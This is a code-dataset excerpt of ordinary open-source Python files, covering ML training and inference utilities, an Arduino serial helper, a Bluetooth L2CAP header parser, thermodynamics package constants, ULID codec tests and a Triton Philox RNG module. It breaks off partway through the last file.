max_stars_repo_path (string, length 4-245) | max_stars_repo_name (string, length 7-115) | max_stars_count (int64, 101-368k) | id (string, length 2-8) | content (string, length 6-1.03M) |
---|---|---|---|---|
python/cuml/test/test_prims.py | Nicholas-7/cuml | 2,743 | 117391 |
<gh_stars>1000+
# Copyright (c) 2019-2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from cuml.prims.label import make_monotonic
from cuml.prims.label import invert_labels
from cuml.prims.label import check_labels
from cuml.test.utils import array_equal
import pytest
import cupy as cp
import numpy as np
@pytest.mark.parametrize("arr_type", ["np", "cp"])
@pytest.mark.parametrize("dtype", [cp.int32, cp.int64])
@pytest.mark.parametrize("copy", [True, False])
def test_monotonic_validate_invert_labels(arr_type, dtype, copy):
arr = np.array([0, 15, 10, 50, 20, 50], dtype=dtype)
original = arr.copy()
if arr_type == "cp":
arr = cp.asarray(arr, dtype=dtype)
arr_orig = arr.copy()
monotonic, mapped_classes = make_monotonic(arr, copy=copy)
cp.cuda.Stream.null.synchronize()
assert array_equal(monotonic, np.array([0, 2, 1, 4, 3, 4]))
# We only care about in-place updating if data is on device
if arr_type == "cp":
if copy:
assert array_equal(arr_orig, arr)
else:
assert array_equal(arr, monotonic)
wrong_classes = cp.asarray([0, 1, 2], dtype=dtype)
val_labels = check_labels(monotonic, classes=wrong_classes)
cp.cuda.Stream.null.synchronize()
assert not val_labels
correct_classes = cp.asarray([0, 1, 2, 3, 4], dtype=dtype)
val_labels = check_labels(monotonic, classes=correct_classes)
cp.cuda.Stream.null.synchronize()
assert val_labels
if arr_type == "cp":
monotonic_copy = monotonic.copy()
inverted = invert_labels(monotonic,
classes=cp.asarray([0, 10, 15, 20, 50],
dtype=dtype), copy=copy)
cp.cuda.Stream.null.synchronize()
if arr_type == "cp":
if copy:
assert array_equal(monotonic_copy, monotonic)
else:
assert array_equal(monotonic, arr_orig)
assert array_equal(inverted, original)
|
neural_parts/models/__init__.py | naynasa/neural_parts_fork | 137 | 117392 |
<gh_stars>100-1000
import torch
try:
from radam import RAdam
except ImportError:
pass
from .flexible_primitives import FlexiblePrimitivesBuilder, \
train_on_batch as train_on_batch_with_flexible_primitives, \
validate_on_batch as validate_on_batch_with_flexible_primitives
class OptimizerWrapper(object):
def __init__(self, optimizer, aggregate=1):
self.optimizer = optimizer
self.aggregate = aggregate
self._calls = 0
def zero_grad(self):
if self._calls == 0:
self.optimizer.zero_grad()
def step(self):
self._calls += 1
if self._calls == self.aggregate:
self._calls = 0
self.optimizer.step()
def optimizer_factory(config, parameters):
"""Based on the provided config create the suitable optimizer."""
optimizer = config.get("optimizer", "Adam")
lr = config.get("lr", 1e-3)
momentum = config.get("momentum", 0.9)
weight_decay = config.get("weight_decay", 0.0)
if optimizer == "SGD":
return OptimizerWrapper(
torch.optim.SGD(parameters, lr=lr, momentum=momentum,
weight_decay=weight_decay),
config.get("aggregate", 1)
)
elif optimizer == "Adam":
return OptimizerWrapper(
torch.optim.Adam(parameters, lr=lr, weight_decay=weight_decay),
config.get("aggregate", 1)
)
elif optimizer == "RAdam":
return OptimizerWrapper(
RAdam(parameters, lr=lr, weight_decay=weight_decay),
config.get("aggregate", 1)
)
else:
raise NotImplementedError()
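# --- illustrative usage (not part of the original module) ---------------------
# A minimal sketch of the gradient-aggregation pattern implemented above: with
# aggregate=4, gradients from four consecutive backward passes accumulate before
# a single optimizer step. `model` and `batches` are illustrative assumptions.
def _example_aggregated_training(model, batches):
    config = {"optimizer": "Adam", "lr": 1e-3, "aggregate": 4}
    optimizer = optimizer_factory(config, model.parameters())
    for x, y in batches:
        optimizer.zero_grad()  # clears gradients only at the start of each window
        loss = torch.nn.functional.mse_loss(model(x), y)
        loss.backward()
        optimizer.step()  # steps the wrapped optimizer only every 4th call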
def build_network(config, weight_file=None, device="cpu"):
network, train_on_batch, validate_on_batch = get_network_with_type(config)
network.to(device)
# Check whether there is a weight file provided to continue training from
if weight_file is not None:
network.load_state_dict(
torch.load(weight_file, map_location=device)
)
return network, train_on_batch, validate_on_batch
def get_network_with_type(config):
network_type = config["network"]["type"]
if network_type == "flexible_primitives":
network = FlexiblePrimitivesBuilder(config).network
train_on_batch = train_on_batch_with_flexible_primitives
validate_on_batch = validate_on_batch_with_flexible_primitives
else:
raise NotImplementedError()
return network, train_on_batch, validate_on_batch
|
utils/clean_json5.py | rw1nkler/prjxray | 583 | 117445 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017-2020 The Project X-Ray Authors.
#
# Use of this source code is governed by an ISC-style
# license that can be found in the LICENSE file or at
# https://opensource.org/licenses/ISC
#
# SPDX-License-Identifier: ISC
import pyjson5
import simplejson
import sys
def main():
simplejson.dump(pyjson5.load(sys.stdin), sys.stdout, indent=2)
if __name__ == "__main__":
main()
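# Usage sketch (hypothetical file names): pipe JSON5 in on stdin, get indented strict JSON on stdout:
#   ./clean_json5.py < tilegrid.json5 > tilegrid.json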
|
inference/centernet.py | donnyyou/centerX | 350 | 117457 |
<reponame>donnyyou/centerX<filename>inference/centernet.py
import torch
import torch.nn as nn
from typing import List
import cv2
from .utils import batch_padding
from modeling.backbone import build_backbone
from modeling.layers import *
__all__ = ["CenterNet"]
class CenterNet(nn.Module):
"""
Implement CenterNet (https://arxiv.org/abs/1904.07850).
"""
def __init__(self, cfg):
super().__init__()
self.device = torch.device(cfg.MODEL.DEVICE)
self.cfg = cfg
# fmt: off
self.num_classes = cfg.MODEL.CENTERNET.NUM_CLASSES
# fmt: on
self.backbone = build_backbone(cfg)
self.upsample = CenternetDeconv(cfg)
self.head = CenternetHead(cfg)
self.mean, self.std = cfg.MODEL.PIXEL_MEAN, cfg.MODEL.PIXEL_STD
pixel_mean = torch.Tensor(cfg.MODEL.PIXEL_MEAN).to(self.device).view(3, 1, 1)
pixel_std = torch.Tensor(cfg.MODEL.PIXEL_STD).to(self.device).view(3, 1, 1)
self.normalizer = lambda x: (x - pixel_mean) / pixel_std
self.to(self.device)
@torch.no_grad()
def _forward(self, batch_images):
features = self.backbone(batch_images)
up_fmap = self.upsample(features)
pred_dict = self.head(up_fmap)
return pred_dict
@torch.no_grad()
def inference_on_images(self, images: List, K=100, max_size=512):
batch_images,params = self._preprocess(images, max_size)
pred_dict = self._forward(batch_images)
heat, wh, reg = pred_dict['cls'], pred_dict['wh'], pred_dict['reg']
batch, cat, height, width = heat.size()
bboxes,scores,clses = CenterNetDecoder.decode(heat, wh , reg, K=K)
clses = clses.view(batch, K)
scores = scores.view(batch, K)
results = []
for i,param in zip(range(batch),params):
scale_x, scale_y = param['width'] / float(param['resized_width']), \
param['height'] / float(param['resized_height'])
bboxes[i, :, 0::2] = bboxes[i, :, 0::2] * scale_x * self.cfg.MODEL.CENTERNET.DOWN_SCALE
bboxes[i, :, 1::2] = bboxes[i, :, 1::2] * scale_y * self.cfg.MODEL.CENTERNET.DOWN_SCALE
result = {'cls': clses[i],
'bbox': bboxes[i],
'scores': scores[i]}
results.append(result)
return results
def _preprocess(self, images: List, max_size=512):
"""
Normalize, pad and batch the input images.
"""
batch_images = []
params = []
for image in images:
old_size = image.shape[0:2]
ratio = min(float(max_size) / (old_size[i]) for i in range(len(old_size)))
new_size = tuple([int(i * ratio) for i in old_size])
resize_image = cv2.resize(image, (new_size[1], new_size[0]))
params.append({'width': old_size[1],
'height': old_size[0],
'resized_width': new_size[1],
'resized_height':new_size[0]
})
batch_images.append(resize_image)
batch_images = [torch.as_tensor(img.astype("float32").transpose(2, 0, 1)) \
for img in batch_images]
batch_images = [img.to(self.device) for img in batch_images]
batch_images = [self.normalizer(img/255.) for img in batch_images]
batch_images = batch_padding(batch_images, 32)
return batch_images, params
def build_model(cfg):
model = CenterNet(cfg)
return model
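# --- illustrative usage (not part of the original module) ---------------------
# A minimal sketch, assuming a detectron2-style `cfg` and trained weights exist;
# "centernet.pth" and "street.jpg" are illustrative names:
#   model = build_model(cfg)
#   model.load_state_dict(torch.load("centernet.pth", map_location=cfg.MODEL.DEVICE))
#   model.eval()
#   dets = model.inference_on_images([cv2.imread("street.jpg")], K=100, max_size=512)
#   # each entry: {'cls': (K,), 'bbox': (K, 4) in original-image pixels, 'scores': (K,)}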
|
cvzone/SerialModule.py | mulakkalfaizal/cvzone | 412 | 117463 |
"""
Serial Module
Uses "pySerial" Package
By: Computer Vision Zone
Website: https://www.computervision.zone/
"""
import serial
import time
import logging
import serial.tools.list_ports
class SerialObject:
"""
    Allows transmitting data to a serial device such as an Arduino.
    Example: sendData([255, 255, 0]) with digits=3 transmits "$255255000".
"""
def __init__(self, portNo=None, baudRate=9600, digits=1):
"""
Initialize the serial object.
:param portNo: Port Number.
:param baudRate: Baud Rate.
:param digits: Number of digits per value to send
"""
self.portNo = portNo
self.baudRate = baudRate
self.digits = digits
connected = False
if self.portNo is None:
ports = list(serial.tools.list_ports.comports())
for p in ports:
if "Arduino" in p.description:
print(f'{p.description} Connected')
self.ser = serial.Serial(p.device)
self.ser.baudrate = baudRate
connected = True
if not connected:
logging.warning("Arduino Not Found. Please enter COM Port Number instead.")
else:
try:
self.ser = serial.Serial(self.portNo, self.baudRate)
print("Serial Device Connected")
            except Exception:
logging.warning("Serial Device Not Connected")
def sendData(self, data):
"""
Send data to the Serial device
:param data: list of values to send
"""
myString = "$"
for d in data:
myString += str(int(d)).zfill(self.digits)
try:
self.ser.write(myString.encode())
return True
        except Exception:
return False
def getData(self):
"""
        Read one '#'-separated line from the serial device.
:return: list of data received
"""
data = self.ser.readline()
data = data.decode("utf-8")
data = data.split('#')
        return data[:-1]
def main():
arduino = SerialObject()
while True:
arduino.sendData([1, 1, 1, 1, 1])
time.sleep(2)
arduino.sendData([0, 0, 0, 0, 0])
time.sleep(2)
if __name__ == "__main__":
main()
|
kedro/pipeline/__init__.py | daniel-falk/kedro | 2,047 | 117466 |
"""``kedro.pipeline`` provides functionality to define and execute
data-driven pipelines.
"""
from .modular_pipeline import pipeline
from .node import node
from .pipeline import Pipeline
__all__ = ["pipeline", "node", "Pipeline"]
|
blesuite/replay/btsnoop/bt/l2cap.py | jreynders/BLESuite-1 | 198 | 117479 |
"""
Parse L2CAP packets
"""
import struct
from . import hci_acl
"""
Fixed channel ids for L2CAP packets
References can be found here:
* https://www.bluetooth.org/en-us/specification/adopted-specifications - Core specification 4.1
** [vol 3] Part A (Section 2.1) - Channel identifiers
"""
L2CAP_CID_NUL = 0x0000
L2CAP_CID_SCH = 0x0001
L2CAP_CID_ATT = 0x0004
L2CAP_CID_LE_SCH = 0x0005
L2CAP_CID_SMP = 0x0006
L2CAP_CHANNEL_IDS = {
L2CAP_CID_NUL : "L2CAP CID_NUL",
L2CAP_CID_SCH : "L2CAP CID_SCH",
L2CAP_CID_ATT : "L2CAP CID_ATT",
L2CAP_CID_LE_SCH : "L2CAP CID_LE_SCH",
L2CAP_CID_SMP : "L2CAP CID_SMP"
}
def parse_hdr(data):
"""
Parse L2CAP packet
0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7
-----------------------------------------------------------------
    |            length             |          channel id           |
-----------------------------------------------------------------
L2CAP is packet-based but follows a communication model based on channels.
A channel represents a data flow between L2CAP entities in remote devices.
Channels may be connection-oriented or connectionless. Fixed channels
other than the L2CAP connectionless channel (CID 0x0002) and the two L2CAP
signaling channels (CIDs 0x0001 and 0x0005) are considered connection-oriented.
All L2CAP layer packet fields shall use Little Endian byte order with the exception of the
information payload field. The endian-ness of higher layer protocols encapsulated within
L2CAP information payload is protocol-specific
References can be found here:
* https://www.bluetooth.org/en-us/specification/adopted-specifications - Core specification 4.1
** [vol 3] Part A (Section 3) - Data Packet Format
Returns a tuple of (length, cid, data)
"""
length, cid = struct.unpack("<HH", data[:4])
data = data[4:]
return length, cid, data
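# Worked example (hypothetical bytes): a 7-byte ATT payload on CID 0x0004 starts with
# the header b'\x07\x00\x04\x00', so parse_hdr(b'\x07\x00\x04\x00' + payload)
# returns (7, 0x0004, payload).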
"""
Codes and names for L2CAP Signaling Protocol
"""
L2CAP_SCH_PDUS = {
0x01 : "SCH Command reject",
0x02 : "SCH Connection request",
0x03 : "SCH Connection response",
0x04 : "SCH Configure request",
0x05 : "SCH Configure response",
0x06 : "SCH Disconnection request",
0x07 : "SCH Disconnection response",
0x08 : "SCH Echo request",
0x09 : "SCH Echo response",
0x0a : "SCH Information request",
0x0b : "SCH Information response",
0x0c : "SCH Create Channel request",
0x0d : "SCH Create Channel response",
0x0e : "SCH Move Channel request",
0x0f : "SCH Move Channel response",
0x10 : "SCH Move Channel Confirmation",
0x11 : "SCH Move Channel Confirmation response",
0x12 : "LE SCH Connection_Parameter_Update_Request",
0x13 : "LE SCH Connection_Parameter_Update_Response",
0x14 : "LE SCH LE_Credit_Based_Connection Request",
0x15 : "LE SCH LE_Credit_Based_Connection Response",
0x16 : "LE SCH LE_Flow_Control_Credit",
}
def parse_sch(l2cap_data):
"""
Parse the signaling channel data.
The signaling channel is a L2CAP packet with channel id 0x0001 (L2CAP CID_SCH)
or 0x0005 (L2CAP_CID_LE_SCH)
0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7 0 1 2 3 4 5 6 7
-----------------------------------------------------------------
    |      code     |       id      |            length             |
-----------------------------------------------------------------
References can be found here:
* https://www.bluetooth.org/en-us/specification/adopted-specifications - Core specification 4.1
** [vol 3] Part A (Section 4) - Signaling Packet Formats
Returns a tuple of (code, id, length, data)
"""
code, id, length = struct.unpack("<BBH", l2cap_data[:4])
return (code, id, length, l2cap_data[4:])
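# Worked example (hypothetical bytes): an Echo request (code 0x08) with identifier 1 and
# an empty payload is b'\x08\x01\x00\x00'; parse_sch(b'\x08\x01\x00\x00') returns (0x08, 1, 0, b'').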
PKT_TYPE_PARSERS = { hci_acl.PB_START_NON_AUTO_L2CAP_PDU : parse_hdr,
hci_acl.PB_CONT_FRAG_MSG : parse_hdr,
hci_acl.PB_START_AUTO_L2CAP_PDU : parse_hdr,
hci_acl.PB_COMPLETE_L2CAP_PDU : parse_hdr }
def parse(l2cap_pkt_type, data):
"""
Convenience method for switching between parsing methods based on type
"""
    parser = PKT_TYPE_PARSERS.get(l2cap_pkt_type)
    if parser is None:
        raise ValueError("Illegal L2CAP packet type")
return parser(data)
def cid_to_str(cid):
"""
Return a string representing the L2CAP channel id
"""
return L2CAP_CHANNEL_IDS[cid]
def sch_code_to_str(code):
"""
Return a string representing the signaling channel PDU
"""
return L2CAP_SCH_PDUS[code]
|
thermo/property_package_constants.py | RoryKurek/thermo | 380 | 117506 |
<filename>thermo/property_package_constants.py
# -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2018, 2019 <NAME> <<EMAIL>>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
.. warning::
These classes were a first attempt at rigorous multiphase equilibrium.
They may be useful in some special cases but they are not complete and
further development will not happen. They were never documented as well.
It is recommended to switch over to the :obj:`thermo.flash` interface
which seeks to be more modular, easier to maintain and extend,
higher-performance, and easier to modify.
'''
from __future__ import division
__all__ = ['PropertyPackageConstants', 'IDEAL_PKG', 'NRTL_PKG', 'UNIFAC_PKG',
'UNIFAC_DORTMUND_PKG', 'PR_PKG', 'SRK_PKG']
from fluids.numerics import brenth, ridder, derivative, numpy as np
from chemicals.utils import log, exp
from fluids.constants import R, pi, N_A
from chemicals.identifiers import IDs_to_CASs
from chemicals.rachford_rice import flash_inner_loop
from thermo.eos_mix import PRMIX, SRKMIX
from thermo.eos import PR, SRK
from thermo.chemical import Chemical
from thermo.mixture import Mixture
from thermo.property_package import *
IDEAL_PKG = 'Ideal'
NRTL_PKG = 'NRTL'
UNIFAC_PKG = 'Unifac'
UNIFAC_DORTMUND_PKG = 'Unifac Dortmund'
PR_PKG = 'PR'
SRK_PKG = 'SRK'
property_packages = [IDEAL_PKG, NRTL_PKG, UNIFAC_PKG, UNIFAC_DORTMUND_PKG,
PR_PKG, SRK_PKG]
property_packages_cubic = [PR_PKG, SRK_PKG]
property_package_to_eos = {PR_PKG: PRMIX, SRK_PKG: SRKMIX}
property_package_to_eos_pures = {PR_PKG: PR, SRK_PKG: SRK}
property_package_names_to_objs = {IDEAL_PKG: IdealCaloric,
NRTL_PKG: Nrtl, # Not complete - enthalpy missing
UNIFAC_PKG: UnifacCaloric,
UNIFAC_DORTMUND_PKG: UnifacDortmundCaloric,
PR_PKG: GceosBase,
SRK_PKG: GceosBase,
}
class PropertyPackageConstants(object):
    '''Class to store kijs and allow properties to be edited; loads them
    from the database and keeps them ready to be stored.
'''
def __init__(self, mixture, name=IDEAL_PKG, **kwargs):
if isinstance(mixture, list):
self.CASs = IDs_to_CASs(mixture)
self.Chemicals = [Chemical(CAS) for CAS in self.CASs]
elif isinstance(mixture, Mixture):
self.Chemicals = mixture.Chemicals
self.name = name
if name not in property_packages_cubic:
eos_mix = PRMIX
eos = PR
else:
eos_mix = property_package_to_eos[name]
eos = property_package_to_eos_pures[name]
self.eos = eos
self.eos_mix = eos_mix
self.eos_in_a_box = [eos_mix]
self.pkg_obj = property_package_names_to_objs[self.name]
self.set_chemical_constants()
self.set_Chemical_property_objects()
self.set_TP_sources()
self.kwargs = kwargs
self.pkg = self.new_package()
def new_package(self):
pkg_args = {'VaporPressures': self.VaporPressures,
'Tms': self.Tms, 'Tbs': self.Tbs, 'Tcs': self.Tcs,
'Pcs': self.Pcs, 'omegas': self.omegas, 'VolumeLiquids': self.VolumeLiquids,
'HeatCapacityLiquids': self.HeatCapacityLiquids,
'HeatCapacityGases': self.HeatCapacityGases,
'EnthalpyVaporizations': self.EnthalpyVaporizations,
'VolumeGases': self.VolumeGases,
'eos': self.eos, 'eos_mix': self.eos_mix,
'MWs': self.MWs,
'atomss': self.atomss,
'Hfs': self.Hfgms,
'Gfs': self.Gfgms,
}
pkg_args.update(self.kwargs)
if self.name == UNIFAC_PKG:
pkg_args['UNIFAC_groups'] = self.UNIFAC_groups
elif self.name == UNIFAC_DORTMUND_PKG:
pkg_args['UNIFAC_groups'] = self.UNIFAC_Dortmund_groups
return self.pkg_obj(**pkg_args)
def from_json(self, json):
self.__dict__.update(json)
self.set_Chemical_property_objects()
self.set_TP_sources()
transfer_methods = ['set_chemical_constants', 'set_Chemical_property_objects',
'set_TP_sources', 'UNIFAC_Dortmund_groups', 'UNIFAC_groups',
'atomss']
try:
for method in transfer_methods:
attr = Mixture.__dict__[method]
setattr(PropertyPackageConstants, method, attr)
except Exception:
for method in transfer_methods:
setattr(PropertyPackageConstants, method, getattr(Mixture, method))
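# --- illustrative usage (not part of the original module) ---------------------
# A minimal sketch, assuming the component names resolve through IDs_to_CASs:
#   constants = PropertyPackageConstants(['water', 'ethanol'], name=PR_PKG)
#   pkg = constants.pkg   # a GceosBase-backed property package using the PR EOS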
|
tests/test_codec.py | xkortex/ulid | 303 | 117534 |
<reponame>xkortex/ulid
"""
test_codec
~~~~~~~~~~
Tests for the :mod:`~ulid.codec` module.
"""
import datetime
import time
import pytest
from ulid import base32, codec, ulid
UNSUPPORTED_TIMESTAMP_TYPE_EXC_REGEX = (r'Expected datetime, int, float, str, memoryview, Timestamp'
r', ULID, bytes, or bytearray')
TIMESTAMP_SIZE_EXC_REGEX = r'Expects timestamp to be 48 bits'
UNSUPPORTED_RANDOMNESS_TYPE_EXC_REGEX = r'Expected int, float, str, memoryview, Randomness, ULID, bytes, or bytearray'
RANDOMNESS_SIZE_EXC_REGEX = r'Expects randomness to be 80 bits'
@pytest.fixture(scope='session', params=[
list,
dict,
set,
tuple,
type(None)
])
def unsupported_type(request):
"""
    Fixture that yields types that cannot be converted to a timestamp/randomness.
"""
return request.param
@pytest.fixture(scope='session', params=[bytes, bytearray, memoryview])
def buffer_type(request):
"""
Fixture that yields types that support the buffer protocol.
"""
return request.param
def test_decode_timestamp_datetime_returns_timestamp_instance():
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given Unix time from epoch in seconds as an :class:`~datetime.datetime`.
"""
value = datetime.datetime.now()
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert int(instance.timestamp) == int(value.timestamp())
def test_decode_timestamp_int_returns_timestamp_instance():
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given Unix time from epoch in seconds as an :class:`~int`.
"""
value = int(time.time())
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert int(instance.timestamp) == value
def test_decode_timestamp_float_returns_timestamp_instance():
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given Unix time from epoch in seconds as a :class:`~float`.
"""
value = float(time.time())
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert int(instance.timestamp) == int(value)
def test_decode_timestamp_str_returns_timestamp_instance(valid_bytes_48):
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given timestamp as a :class:`~str`.
"""
value = base32.encode_timestamp(valid_bytes_48)
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert instance.str == value
def test_decode_timestamp_bytes_returns_timestamp_instance(buffer_type, valid_bytes_48):
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given timestamp as an object that supports the buffer protocol.
"""
value = buffer_type(valid_bytes_48)
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert instance.bytes == value
def test_decode_timestamp_timestamp_returns_timestamp_instance(valid_bytes_48):
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given timestamp as a :class:`~ulid.ulid.Timestamp`.
"""
value = ulid.Timestamp(valid_bytes_48)
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert instance == value
def test_decode_timestamp_ulid_returns_timestamp_instance(valid_bytes_128):
"""
Assert that :func:`~ulid.codec.decode_timestamp` returns a new :class:`~ulid.ulid.Timestamp` instance
from the given timestamp as a :class:`~ulid.ulid.ULID`.
"""
value = ulid.ULID(valid_bytes_128)
instance = codec.decode_timestamp(value)
assert isinstance(instance, ulid.Timestamp)
assert instance == value.timestamp()
def test_decode_timestamp_with_unsupported_type_raises(unsupported_type):
"""
Assert that :func:`~ulid.codec.decode_timestamp` raises a :class:`~ValueError` when given
a type it cannot compute a timestamp value from.
"""
with pytest.raises(ValueError) as ex:
codec.decode_timestamp(unsupported_type())
assert ex.match(UNSUPPORTED_TIMESTAMP_TYPE_EXC_REGEX)
def test_decode_timestamp_with_incorrect_size_bytes_raises(valid_bytes_128):
"""
Assert that :func:`~ulid.codec.decode_timestamp` raises a :class:`~ValueError` when given
a type that cannot be represented as exactly 48 bits.
"""
with pytest.raises(ValueError) as ex:
codec.decode_timestamp(valid_bytes_128)
assert ex.match(TIMESTAMP_SIZE_EXC_REGEX)
def test_decode_randomness_int_returns_randomness_instance(valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as an :class:`~int`.
"""
value = int.from_bytes(valid_bytes_80, byteorder='big')
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance.int == value
def test_decode_randomness_float_returns_randomness_instance(valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
    from the given random values as a :class:`~float`.
"""
value = float(int.from_bytes(valid_bytes_80, byteorder='big'))
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance.int == int(value)
def test_decode_randomness_str_returns_randomness_instance(valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as an :class:`~str`.
"""
value = base32.encode_randomness(valid_bytes_80)
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance.str == value
def test_decode_randomness_bytes_returns_randomness_instance(buffer_type, valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as an object that supports the buffer protocol.
"""
value = buffer_type(valid_bytes_80)
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance.bytes == value
def test_decode_randomness_randomness_returns_randomness_instance(valid_bytes_80):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as a :class:`~ulid.ulid.Randomness`.
"""
value = ulid.Randomness(valid_bytes_80)
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance == value
def test_decode_randomness_ulid_returns_randomness_instance(valid_bytes_128):
"""
Assert that :func:`~ulid.codec.decode_randomness` returns a new :class:`~ulid.ulid.Randomness` instance
from the given random values as a :class:`~ulid.ulid.ULID`.
"""
value = ulid.ULID(valid_bytes_128)
instance = codec.decode_randomness(value)
assert isinstance(instance, ulid.Randomness)
assert instance == value.randomness()
def test_decode_randomness_with_unsupported_type_raises(unsupported_type):
"""
Assert that :func:`~ulid.codec.decode_randomness` raises a :class:`~ValueError` when given
a type it cannot compute a randomness value from.
"""
with pytest.raises(ValueError) as ex:
codec.decode_randomness(unsupported_type())
assert ex.match(UNSUPPORTED_RANDOMNESS_TYPE_EXC_REGEX)
def test_decode_randomness_with_incorrect_size_bytes_raises(valid_bytes_128):
"""
Assert that :func:`~ulid.codec.decode_randomness` raises a :class:`~ValueError` when given
a type that cannot be represented as exactly 80 bits.
"""
with pytest.raises(ValueError) as ex:
codec.decode_randomness(valid_bytes_128)
assert ex.match(RANDOMNESS_SIZE_EXC_REGEX)
|
python/triton/language/random.py | h-vetinari/triton | 146 | 117541 |
import triton
from . import core as tl
PHILOX_KEY_A: tl.constexpr = -1640531527 # 0x9E3779B9
PHILOX_KEY_B: tl.constexpr = -1150833019 # <KEY>
PHILOX_ROUND_A: tl.constexpr = -766435501 # 0xD2511F53
PHILOX_ROUND_B: tl.constexpr = -845247145 # 0xCD9E8D57
N_ROUNDS_DEFAULT = 10 # Default number of rounds for philox
# -------------------
# randint
# -------------------
@triton.jit
def philox_impl(c0, c1, c2, c3, k0, k1, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Run `n_rounds` rounds of Philox for state (c0, c1, c2, c3) and key (k0, k1).
"""
for _ in range(n_rounds):
# update random state
A = PHILOX_ROUND_A
B = PHILOX_ROUND_B
_c0, _c2 = c0, c2
c0 = tl.umulhi(B, _c2) ^ c1 ^ k0
c2 = tl.umulhi(A, _c0) ^ c3 ^ k1
c1 = B * _c2
c3 = A * _c0
# raise key
k0 = k0 + PHILOX_KEY_A
k1 = k1 + PHILOX_KEY_B
return c0, c1, c2, c3
@triton.jit
def philox(seed, c0, c1, c2, c3, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
seed = seed.to(tl.uint64)
seed_hi = ((seed >> 32) & 0xffffffff).to(tl.uint32)
seed_lo = (seed & 0xffffffff).to(tl.uint32)
return philox_impl(c0, c1, c2, c3, seed_lo, seed_hi, n_rounds)
@triton.jit
def randint(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block, returns a single
block of random :code:`int32`.
If you need multiple streams of random numbers,
using `randint4x` is likely to be faster than calling `randint` 4 times.
:param seed: The seed for generating random numbers.
    :param offset: The offsets to generate random numbers for.
"""
ret, _, _, _ = randint4x(seed, offset, n_rounds)
return ret
@triton.jit
def randint4x(seed, offset, n_rounds: tl.constexpr = N_ROUNDS_DEFAULT):
"""
Given a :code:`seed` scalar and an :code:`offset` block, returns four
blocks of random :code:`int32`.
This is the maximally efficient entry point
to Triton's Philox pseudo-random number generator.
:param seed: The seed for generating random numbers.
    :param offset: The offsets to generate random numbers for.
"""
# _0 = tl.zeros(offset.shape, offset.dtype)
_0 = offset * 0
return philox(seed, offset, _0, _0, _0, n_rounds)
# -------------------
# rand
# -------------------
# @triton.jit
# def uint32_to_uniform_float(x):
# """
# Numerically stable function to convert a random uint32 into a random float uniformly sampled in [0, 1).
# """
# two_to_the_minus_32: tl.constexpr = 2.328306e-10
# return x * two_to_the_minus_32
@triton.jit
def uint32_to_uniform_float(x):
"""
